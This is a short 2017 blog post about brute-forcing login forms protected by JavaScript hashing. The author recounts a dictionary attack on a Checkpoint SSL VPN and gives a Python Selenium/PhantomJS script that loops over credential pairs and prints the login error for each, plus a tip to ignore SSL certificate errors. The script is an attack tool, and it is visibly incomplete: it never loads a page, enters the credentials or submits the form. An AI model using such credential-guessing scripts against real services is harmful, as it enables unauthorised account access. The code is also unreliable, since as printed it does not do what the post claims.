Tuesday, June 20, 2017

Attacking Complex Web Application Login Forms

Requests, Mechanize, and other HTTP clients or web scrapers are wonderful for automating a variety of tasks against web servers. Many times, if you want to brute force a login against some web app you can just use tools like those or Burp Intruder or whatever else strikes your fancy.

But sometimes, you run across a web app that does some ungodly Javascript hashing/mangling/demonic incantations to your input. When you see these situations, you need to have a tool parse, understand, and even execute the Javascript from your page.

I have found PhantomJS to be a fantastic tool to help with that. I use it as my "browser" for Selenium scripts and it works the same way, but this is all headless, no need for Firefox or Chrome windows to pop up and start clicking things. It all happens in the background transparently.

I recently came across a Checkpoint SSL VPN that I wanted to try a dictionary attack against. I wrote the following temporary script to accomplish it. It's not speedy, but then again that introduces a pseudo-sleep timer I was going to put in anyway.

I pasted the login combinations in the logins dict and ran it.

#!/usr/bin/env python3

from selenium import webdriver
from selenium.webdriver.common.keys import Keys

logins = {'user1':'pass1', 'user2':'pass2'}

for username, password in logins.items():
 driver = webdriver.PhantomJS()
 driver.set_window_size(1024, 768)
 usernamefield = driver.find_element_by_name('userName')
 passwordfield = driver.find_element_by_name('loginInput')
 errormsg = driver.find_element_by_id('ErrorMsg').text
 print(username + ':' + password + ' = ' + errormsg)

It turns out that phantomjs will return a completely empty page without any sort of error if it encounters an invalid SSL certificate. You can easily account for this by changing:
 driver = webdriver.PhantomJS()
driver = webdriver.PhantomJS(service_args=['--ignore-ssl-errors=true'])

No comments:

Post a Comment